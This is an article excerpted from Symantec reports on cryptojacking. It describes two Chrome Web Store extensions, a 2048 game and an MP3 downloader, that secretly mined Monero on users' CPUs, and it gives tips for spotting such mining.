Article based and excerpted from Symantec reports
One of the biggest cyber security trends of 2018 is cryptojacking, where cyber criminals surreptitiously run coinminers on victims’ devices without their knowledge and use their Central Processing Unit (CPU) power to mine cryptocurrencies.
This has been such a big trend this year that Symantec has published a research paper on this topic, featuring insights and analysis about this cyber security threat.
Cryptojacking surged in the last quarter of 2017, with its growth in popularity coinciding with a surge in the value of cryptocurrencies, including Monero, which is what is mainly mined by CPU miners.
Cryptojacking in the cloud could also cause additional costs for businesses that are billed based on CPU usage.
What is cryptojacking?
Computer programs called coinminers are used to mine cryptocurrencies. Cryptocurrencies are digital currencies created using computer programs and computing power. Bitcoin is the best-known cryptocurrency, but it cannot be mined using personal computers—it requires specialist equipment to mine.
The cryptocurrency we primarily see mined on personal computers is Monero.
-File-based coin mining involves downloading and running an executable file on your computer.
-Browser-based coin mining takes place inside a web browser and is implemented using scripting languages.
Coin mining is not illegal, and many people choose to run files or scripts on their computers to carry out coin mining to make money themselves. Some websites may also use coin mining as an alternative to advertising to generate revenue, which is fine provided customers are told that their CPU power will be used to mine cryptocurrency while they are visiting that website.
The problems arise when people aren’t aware their computers are being used to mine cryptocurrency, or if cyber criminals surreptitiously install coinminers on victims’ computers or Internet of Things (IoT) devices without their knowledge—this is cryptojacking.
On May 8, we discovered two extensions for Google’s Chrome web browser that secretly perform coin mining after they are installed. Both extensions were found on the official Google Chrome Web Store.
One of the extensions, called 2048, is a version of a popular math-based strategy game. The extension was published in August 2017 and has over 2,100 users, which suggests the publisher has made some profit using the CPU cycles of those users to mine for cryptocurrency.
Strategy game 2048 secretly mines for cryptocurrency
The 2048 extension has over 2,100 users
The other extension, Mp3 Songs Download, claims to be an MP3 downloader but just redirects the user to an MP3 download website when they click on the extension button. The MP3 download website secretly launches a coin-mining script in the background. The Mp3 Songs Download extension was published in June 2017 and has around 4,000 users.
The Mp3 Songs Download Chrome extension has almost 4,000 users
Coin-mining script: 2048
The source code for the 2048 extension contains a hardcoded domain that is triggered when Chrome is launched.
Coin-mining script: Mp3 Songs Download
The extension Mp3 Songs Download doesn’t start its coin-mining script until the user clicks on the extension button and is redirected to a website.
Website looks and functions like a normal MP3 download site
Impact on users
The coin mining will persist for as long as the browser (with the 2048 extension installed) or website (in the case of the Mp3 Songs Download extension) remains open. The effects of this activity could include device slowdown, overheating batteries, increased energy consumption, and even devices becoming unusable.
CPU usage spikes due to Mp3 Songs Download extension
Furthermore, the malicious activity of these extensions is made harder to detect by the fact that they function as described. For example, the game 2048 is playable just like any 2048 game and the MP3 website contains downloadable MP3 files. This means that many users will not be suspicious and may not realize their computing power is being hijacked to make money for the developers behind these extensions.
We notified Google about these coin-mining extensions and they have now been removed from the Google Chrome Web Store.
Symantec and Norton products detect the extensions as the following:
-Pay close attention to CPU and memory usage on your computer or device. Abnormally high usage could be an indication of coin-mining.
-Check the app developer’s name, which can be found on the app’s store page. Do an internet search for the developer as there may be users who have had experience of their apps—good or bad.
-Check the app reviews. While fake reviews are common, they’re often short and generic. There may also be legitimate reviews from users who have figured out that the app isn’t what it appears to be.